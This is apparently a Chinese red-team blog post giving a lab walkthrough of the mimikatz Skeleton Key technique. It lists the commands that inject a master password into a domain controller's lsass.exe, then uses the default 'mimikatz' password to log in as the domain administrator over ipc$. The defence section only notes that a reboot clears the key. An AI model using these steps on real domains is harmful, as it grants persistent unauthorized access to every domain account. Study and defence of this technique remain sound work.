大家好,这里是 渗透攻击红队 的第 39 篇文章,本公众号会记录一些我学习红队攻击的复现笔记(由浅到深),不出意外每天一更
Skeleton Key
使用 Skeleton Key(万能密码),可以对域内权限进行持久化操作。
使用 mimikatz 完成注入 Skeleon Key 的操作,将 Skeleton Key 注入域控制器的 lsass.exe 进程。
万能密码
实验环境
远程系统:
域控制器:
域成员服务器:
Mimikatz 中使用 Skeleton Key
尝试以当前登录用户身份列出域控制器 C 盘共享目录中的文件:
dir \\192.168.3.21\c$
因为此时是一个普通的域用户身份,所以系统提示权限不足!
这个时候使用域管理员账号和密码进行连接:
net use \\192.168.3.21\ipc$ "Admin12345" /user:god\administrator
连接成功,这个时候就列出了域控制器 C 盘的共享目录。
之后在域控制器中以管理员权限打开 mimikatz,输入命令将 Skeleton Key 注入域控制器的 lsass.exe 进程:
# 提升权限
privilege::debug
# 注入 skeleton key
misc::skeleton
这个时候系统提示 Skeleton Key 已经注入成功,此时会在域内的所有账号中添加一个 Skeleton Key,其密码默认为:“mimikatz”。
接下来就可以了使用域内任意用户的身份配合 Skeleton Key 进行域内身份授权验证了。
在不使用域管理员原始密码的情况下,使用注入的 Skeleton Key,同样可以成功连接系统:
# 查看现有 ipc$
net use
# 将之前建立的 ipc$ 删除
net use \\192.168.3.21\ipc$ /del /y
输入命令,使用域管理员账号和 Skeleton Key 与域控制器建立 ipc$:
net use \\OWA2010CN-God\ipc$ "mimikatz" /user:god\administrator
建立成功后这样就可以列出域控制器的共享目录了!
Skeleton Key 防御措施
PS:因为 Skeleton Key 是被注入到 lsass.exe 进程的,所以它只存在于内存中,如果域控制器重启,注入的 Skeleton Key 将会失效。